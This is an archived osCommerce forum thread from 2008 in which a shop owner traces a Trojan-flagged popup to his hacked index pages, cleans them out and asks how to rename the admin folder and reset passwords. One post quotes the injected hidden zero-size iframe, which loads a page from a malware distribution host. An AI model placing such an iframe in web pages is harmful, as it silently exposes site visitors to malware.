Guest Posted March 16, 2008 Posted March 16, 2008 Today I'm getting a popup asking to install an add-on when I access my Admin or Catalog. Checking through my Host file manager, I find that the htdocs and Index have been modified at 3am today. I'm not sure what I'm looking for in the Index to see if anything was added. Site is www.webberaerialimaging.com/catalog Not sure what the popup is but it triggers my virus checker as a Trojan Any assistance is greatly appreciated! Thanks, Mark
Guest Posted March 16, 2008 Posted March 16, 2008 I've checked over both Index files(catalog and admin) and cannot find what was added. I'm wondering if it's possible to just replace my current Index files with a clean version. Also, is it possible to download just the index files from here? Thanks, Mark
Guest Posted March 17, 2008 Posted March 17, 2008 This does only seem to affect the index pages. Product pages do not generate the popup. Can anyone check my index for unwanted code? No matter how long I stare at it, I don't see the problem.
SambaMambo Posted March 17, 2008 Posted March 17, 2008 what is the <iframe> in the top of the source and in the bottom ?
Guest Posted March 17, 2008 Posted March 17, 2008 Yep, I just found that. Looks like it's in the bottom iframe Looks like this: <iframe src="http://x-traff.info/in.cgi?default" width="0" height="0" frameborder="0"></iframe> What if anything should it read? I don't see a top iframe. Thanks for the look!
pvtparts Posted March 17, 2008 Posted March 17, 2008 I reckon that whole iframe shouldn't be there. A quick google around suggests that the x-traff.info site is a deploy vector for malware. Presumably, somebody has written the iframe to your php files.
Guest Posted March 17, 2008 Posted March 17, 2008 Ok, I've removed the whole iframe. Site seems to function normally now. I can only figure that it was accessed via the admin. Is it possible to change the Admin file name to make it more difficult for hackers in the future to locate my admin page? EDIT: Seems I was wrong. Recent access is still pulling a popup for that site. Must be multiple entries. Oh Boy...
Bushmaster Posted March 17, 2008 Posted March 17, 2008 Ok, I've removed the whole iframe. Site seems to function normally now. I can only figure that it was accessed via the admin. Is it possible to change the Admin file name to make it more difficult for hackers in the future to locate my admin page? EDIT: Seems I was wrong. Recent access is still pulling a popup for that site. Must be multiple entries. Oh Boy... Yes you can rename your admin folder to anything you want it to be. You just need to be sure to change the path in your config files.
satish Posted March 17, 2008 Posted March 17, 2008 Probably Your system wher You are doing PHP development has been attacked and it will write to PHP files. So unaware You will be uploading these files. Try some antivirus or other solutions to clear You PC. Take this seriosly as some visitors might get afraid and will never visit Your site plus some search engines may ban Your site if malwares/trojens reported. Satish Ask/Skype for Free osCommerce value addon/SEO suggestion tips for your site. Check My About US For who am I and what My company does.
Guest Posted March 17, 2008 Posted March 17, 2008 I have not done any work on the site, particularly at the time this all occured. I have checked over my compter, in any case. Thank you for the suggestion. Pardon my ignorance, but which and how many config files need the paths changed if I rename the Admin? I also cannot locate where to change my login/password. Thanks for all the help, so far. Mark
Guest Posted March 17, 2008 Posted March 17, 2008 Finally got it all cleaned out. Every Index file was infected(wow, there are a lot of them). All pages on the Admin and Catalog sides load w/o the popup. Now, for new security measures. How to change Admin and reset login/password?
pvtparts Posted March 17, 2008 Posted March 17, 2008 Now, for new security measures. How to change Admin and reset login/password? If memory serves, you can just use your FTP client to rename the admin directory. I don't think there are any paths to change. Your server administration / control panel may have a tool for writing new .htaccess / .htpasswd files.
Guest Posted March 18, 2008 Posted March 18, 2008 I did see a few config files that had defined 'admin'. I'll check the server control panel. Don't recall seeing that tool, but I'll check. Thanks Edit: Got the password changed on the server control panel. Thanks for that! I remain a bit concerned about renaming the admin file w/o changing any of the paths.
Guest Posted March 18, 2008 Posted March 18, 2008 If memory serves, you can just use your FTP client to rename the admin directory. I don't think there are any paths to change. Your server administration / control panel may have a tool for writing new .htaccess / .htpasswd files. If you rename the folder on your hard drive and ftp it to the server, you'll need to make sure you also delete the old admin folder from the server and change the path to admin in the admin folder cofiguration file.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.